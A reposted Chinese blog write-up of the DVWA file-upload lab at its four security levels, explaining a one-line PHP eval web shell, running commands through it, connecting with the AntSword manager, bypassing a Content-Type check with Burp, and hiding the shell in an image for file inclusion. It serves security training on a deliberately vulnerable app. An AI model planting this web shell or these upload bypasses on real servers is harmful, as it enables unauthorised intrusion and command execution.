DVWA File Upload(文件上传)全等级

x33g5p2x  于2022-02-12 转载在 其他  
字(0.8k)|赞(0)|评价(0)|浏览(521)

File Upload(文件上传)

一句话木马的构成

常见的一句话木马:

<?php @eval($_POST['shell']); ?>

最外层的是 <?php和?> 这是php文件的起始和结束标记,

php会解析执行 <?php ?>里面的代码。

然后是eval函数,eval()函数把字符串按照 PHP 代码来计算,简单来说就是它可以执行php代码。

里面$_POST[‘shell’]代表用POST提交参数为shell的值。

1. Low

没有任何校验,想传什么就传什么。

1.上传一句话木马1.php

代码如下:

<?php
@eval($_POST['shell']);
?>

文件保存在根目录/hackable/uploads/shell.php下。

localhost/dvwa/hackable/uploads/1.php?shell= phpinfo();

可以以shell为参数执行php命令。

例如:

可以在shell=echo(exec());里面执行系统命令并且输出到页面。

例如:

2.中国蚁剑

中国蚁剑是一款跨平台的开源网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。

添加数据:

然后就获得权限,可以进行数据管理,输入命令等操作。图如下:

2.Medium

查看源码发现对uploaded_type,也就是http报文的Content-Type字段进行了校验,只能是image/jpeg和image/png。

用burp抓包,把Content-Type字段值改为image/jpeg即可绕过,成功上传文件。

3. High

查看源码发现真的只能上传jpg和png图片了

所以尝试上传图片马,打开一个正常的图片,在图片尾部写入一句话木马

然后利用文件包含来进行执行命令

不知道为啥连接不到蚁剑,如果有懂的人希望给我讲一下。

4.Impossible

对上传文件md5重命名了,还对后缀名、文件类型、文件大小进行了限制和检查,杜绝了上传木马文件的机会。

相关文章